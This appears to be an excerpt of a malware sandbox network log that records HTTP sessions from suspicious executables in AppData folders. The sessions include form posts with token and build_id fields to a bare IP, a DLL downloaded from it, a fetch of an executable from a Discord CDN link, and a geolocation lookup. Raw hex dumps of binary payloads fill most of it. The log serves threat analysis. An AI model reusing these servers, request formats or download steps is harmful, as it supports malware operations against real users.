2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: c8 45 45 06 0f c8 29 c6 ea 11 c0 79 a6 65 93 ed d9 79 d3 42 f7 81 b0 72 27 0c f7 eb d6 4d de 23 11 03 6d 1b 5d c2 8e 49 89 09 64 7f f4 2b 61 9b 01 38 6e 25 86 94 81 e8 6d 4a d6 13 48 02 6d c4 bb 2a c2 23 c4 9a ac 8c 86 bd b9 6f c8 e6 23 fa 57 41 0f 1a 70 52 41 51 7e a9 b2 8a 41 d2 c9 c1 63 7e ba df 23 78 e5 7d f3 29 c6 d9 a0 dd c4 be 27 53 1d 52 00 25 3a c0 bc 18 40 a8 27 f2 a1 f5 69 ae 1b b8 c7 34 05 a3 b6 c4 21 b9 9f f0 3e 4c bb 72 57 9d d4 40 38 08 f6 66 f9 10 7a 88 22 a7 89 56 39 f2 d2 31 1b 1a 59 17 46 96 63 65 fb 97 7c 06 44 d8 fa e3 4e 7c 8b 4c be 92 f9 c4 b7 3b ed 0d a6 74 14 e4 ea 7b 35 20 d2 ac 4e 7c 35 f0 7b 59 97 18 02 fc 96 4e 8a a1 bc 53 0c 56 c1 52 3b ea ae bf 3a 97 42 ff d7 ff 68 cf ee 51 f5 f8 b9 09 b2 71 c7 20 52 55 d6 49 2a e7 8d c8 30 Data Ascii: EE)yeyBr'M#m]Id+a8n%mJHm#o#WApRAQ~Ac~#x})'SR%:@'i4!>LrW@8fz"V91YFce\|DN\|L;t{5 N\|5{YNSVR;:BhQq RUI0
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: f3 76 ed 13 2d 6d a6 a9 50 78 70 56 a1 0b 68 b2 be 2e de 38 9c 05 da 23 c8 68 18 45 b5 57 00 9a 7f 05 62 8e ff 3c 1c e9 fd 53 f2 fa 85 81 b6 ca 9f 6a 41 12 7b c9 d6 a9 51 3c 67 e7 09 60 31 40 e4 f9 82 26 ed 71 30 75 87 1c 88 68 fd 7b d2 4f 01 08 e8 e1 ce 01 83 e8 f9 b3 45 c9 08 72 84 79 e0 ec eb bc 13 0f 2c ca 8e 03 0f 9b c3 8b 80 a8 c4 53 d2 07 dd fc ac 0c 72 a7 ed 35 a2 c3 70 90 9e 68 b3 04 25 c2 dc ec bb 20 0f e8 40 2c 2b 55 6c ae a4 fa 3c e5 79 52 01 39 1e 7b 6e 0f cf 00 24 1b 26 19 ad ab 92 49 cd e8 0f cc b6 52 c4 77 c1 1e 83 95 6c 14 2b 25 d7 af b1 64 2d 56 f2 3c b5 b7 e4 22 f0 90 8f b8 9d 09 6a 8f 09 71 f4 74 76 68 a3 e3 5b 5d b1 b0 64 a4 29 1a c6 41 bf 3f db c5 b8 34 bd b3 b2 ca f4 46 be 2c 53 10 6d 15 5d 56 23 36 97 09 7d 2f a7 6a 02 25 94 7d 52 Data Ascii: v-mPxpVh.8#hEWb<SjA{Q<g`1@&q0uh{OEry,Sr5ph% @,+Ul<yR9{n$&IRwl+%d-V<"jqtvh[]d)A?4F,Sm]V#6}/j%}R
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: d9 66 b3 91 fe 72 af d5 20 e3 2a 87 ad c6 e1 b6 dc 58 3c e4 2a d8 b6 62 a7 28 54 ab 3b 7f 9d ef fd f4 cd 4c f7 29 d6 cb 18 5f db 16 aa 6c f7 7d 8c f7 e3 13 c3 8a 73 5f af 6c 88 30 af 1a c6 c6 f3 b9 d1 ee f7 f8 0a 6d 89 b1 05 37 83 2c 8f 6f c5 cb ae 70 e3 ca 30 69 c8 7c 37 76 12 21 b1 d5 1c 61 62 19 a5 c7 27 27 07 67 56 14 02 21 8d 3d 03 3b 18 ca 2a 35 01 d0 8d b0 ac 74 15 29 5a b4 61 44 f9 58 c2 33 15 de 4c 4e 83 7e 22 67 54 3a bf df 48 60 08 2c 03 c2 29 0c c5 8b f3 38 05 2e 2d 53 f9 85 ed 7c 42 49 c7 37 2d bd ee 62 38 a9 2a cf 55 77 e4 cc f3 3b 06 42 a7 85 ab b5 06 1a bf 25 0c a0 a5 c2 29 cf d6 25 db 4f 88 b7 fe bc 7e a1 95 ed b6 a4 6d 43 3a b0 98 e7 79 fd 0a 45 a1 df 41 04 37 a5 90 53 33 45 d8 29 d7 19 5b 14 1d f5 a6 88 9a c8 4d 17 3e 3c b0 d6 ea 27 3c Data Ascii: fr X<b(T;L)_l}s_l0m7,op0i\|7v!ab''gV!=;5t)ZaDX3LN~"gT:H`,)8.-S\|BI7-b8Uw;B%)%O~mC:yEA7S3E)[M><'<
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: 5d 68 c2 84 d5 1f b7 90 64 7f 7f f4 85 d8 af 06 a1 44 c3 57 de 12 2d cc a3 cc 6b 6b 30 4b a1 cf 35 81 c3 36 15 4f b7 14 a4 ba 3f d2 99 50 fb 8e 70 5b 2c a7 37 0a 05 a3 87 a9 76 37 2d f8 19 d4 fe 78 01 91 c1 35 b5 39 2f c9 94 62 f0 56 46 ad 16 b1 c2 27 9a 8c a1 9d 8c 53 3a d4 ab d2 64 ad fa 18 f4 cc b8 73 c6 f7 2b 62 d5 76 b0 3e 75 ea 23 7a 0e eb 29 d2 f9 e5 ae ef a6 b1 67 73 07 3f 63 c7 b0 7c 9b 99 31 2c 05 08 77 f8 f6 ea ea 7e e2 8b 7d aa 9f de 25 35 ac 9b ee 0f 19 9c 40 7e 8e d6 ef b4 53 a3 77 28 e5 4e 33 04 57 71 42 02 72 17 1d f4 cb 71 fe 45 c9 df 84 9a b2 54 6a 94 33 2e b7 04 46 59 24 30 ed 3a a9 a2 9d 73 87 ae 6f 9c 17 2a 32 f5 b5 2c 4a 97 cb f5 f9 da 11 7d b3 b5 ce d8 10 3d bd 93 9c ae 96 1b 1a 6b 91 d4 3b 6d 9d 95 93 94 f8 42 a5 d2 ef c5 5d 8a a9 Data Ascii: ]hdDW-kk0K56O?Pp[,7v7-x59/bVF'S:ds+bv>u#z)gs?c\|1,w~}%5@~Sw(N3WqBrqETj3.FY$0:so*2,J}=k;mB]
2024-04-04 15:49:22 UTC	15331	OUT	Data Raw: 80 28 ef 1f 4f d0 8f ff bf d3 64 fe 3a 8d 8e 9a 9c bf be 40 49 00 dc f9 57 55 ff 13 48 e2 87 04 2d 3b 0c ac 93 00 29 b7 4e fa f7 ba 5c d1 65 0a b7 23 ab 06 ad bc ae d9 ec 8d a9 95 4b 10 bf cb 14 75 fd f0 53 44 73 81 23 b4 98 3b b7 a5 30 58 96 7d 40 14 31 2e de 9b f2 29 8e ce 0d 7b b6 f3 8f c2 6e 99 b9 49 e0 d9 a2 07 31 0e db 5a bd 14 02 8a 79 0d 08 20 74 e7 63 3a 0a 94 69 ae 9e f5 6f 88 32 9b fc 7b f5 48 09 5c 78 8c e9 33 2a fc e8 1b ca a1 ab 53 14 f7 f2 57 b4 11 04 c7 c0 67 c4 98 0e 31 e5 3b 8a b9 63 6b 6d 18 66 d1 25 90 55 89 fc 0a 67 23 c8 af 43 16 0c 1d cd c3 f4 82 78 e6 30 4d 1a d4 2e fb a8 66 95 61 34 98 5e ed 8e 91 99 fb e1 63 47 3c a2 c8 53 75 4a b8 58 a7 b7 f1 fe 52 7b 56 4e 5d cd 8c 0f 91 06 e2 4b 62 7f c4 b8 47 7a db 02 11 e4 74 29 1b bd cc 03 Data Ascii: (Od:@IWUH-;)N\e#KuSDs#;0X}@1.){nI1Zy tc:io2{H\x3*SWg1;ckmf%Ug#Cx0M.fa4^cG<SuJXR{VN]KbGzt)
2024-04-04 15:49:25 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4kg2tjuvpr75g3d5o9nf49jgoe; expires=Mon, 29-Jul-2024 09:36:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ig%2BTZdoQ07mkTpAlLVpf8gFkfqB5Y2pAKTwTAH5eTqsCQiGMMha7oaXPor1gqcCyuqMXml4g5N8QdSWGr7EG7hUDTMgqd5dQ58HQyHp0%2BBbB0MrEu5GG%2F4ZUUKT%2FlmnFXxHBttnlatNO%2BEE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f272afda357486-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49773	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:23 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:23 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------HCAAEBKEGHJKEBFHJDBFCont
2024-04-04 15:49:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:24 UTC	18	IN	Data Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 8YmxvY2s=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49774	162.159.133.233	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:23 UTC	314	OUT	GET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com
2024-04-04 15:49:23 UTC	1070	IN	HTTP/1.1 404 Not Found Date: Thu, 04 Apr 2024 15:49:23 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=cFWHzNk64gUphjGg4iYi4.gAm2uWvnA7HQGC6cLHdb4-1712245763-1.0.1.1-IGJTnCh8pFb9qSfKccN5CZsuE6tUeQ3fT7ynf8z7mh4uvNE6JHGAXCNN_X_G8XVTah_jmpAUrT.6Jj_5XsWWRw; path=/; expires=Thu, 04-Apr-24 16:19:23 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lmV%2BpwKPLTnkjJdIuSB5Z8%2BO9cVrIkQsUIsggxlWgErJk3QopXmHnH6Zq9hmkdmk%2FdY8TbISjnf%2FK%2BbalE0jlg7y530JlkPn%2BXjdzzM3Wa0FQd03WUq83zFHiaCtzugdJNZ%2FqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: _cfuvid=dvhoS4JwQS9b42_0zZuZR9oWplN_Dl9JzVq1szj6zbQ-1712245763561-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 86f272b639360971-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:23 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49775	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:24 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:24 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------DAAAFBKECAKEHIEBAFIECont
2024-04-04 15:49:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:25 UTC	18	IN	Data Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 8YmxvY2s=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49777	104.21.65.24	443	6044	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:26 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-04 15:49:26 UTC	910	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 04 Apr 2024 15:49:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=purIS%2BABIrt6BHLU7OUOTs6vO2dZjJ6WtBjaNL4gT3CznGtmXd00AzY6aY9moYX44FBuODY8lXBzrk596UrEX4BRCXRq3cxqH3hTi2vALuSJiaoFtTZPuDfoS9%2Fp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f272c8da818dac-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:26 UTC	459	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 66 34 39 63 39 31 39 38 38 34 62 34 63 36 39 64 38 34 64 61 39 39 39 31 63 62 38 37 38 31 39 36 39 65 39 31 39 37 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#f49c919884b4c69d84da9991cb8781969e9197
2024-04-04 15:49:26 UTC	471	IN	Data Raw: d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 62 61 33 61 65 61 37 62 62 38 62 66 39 61 32 62 62 65 35 62 65 61 61 66 34 62 38 62 65 61 39 61 31 61 65 61 38 62 66 66 36 66 39 61 32 62 62 65 35 62 65 61 61 22 3e 3c 73 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#cba3aea7bb8bf9a2bbe5beaaf4b8bea9a1aea8bff6f9a2bbe5beaa"><s
2024-04-04 15:49:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49776	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:26 UTC	220	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Cache-Control: no-cache
2024-04-04 15:49:27 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:26 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-04 15:49:27 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-04 15:49:27 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
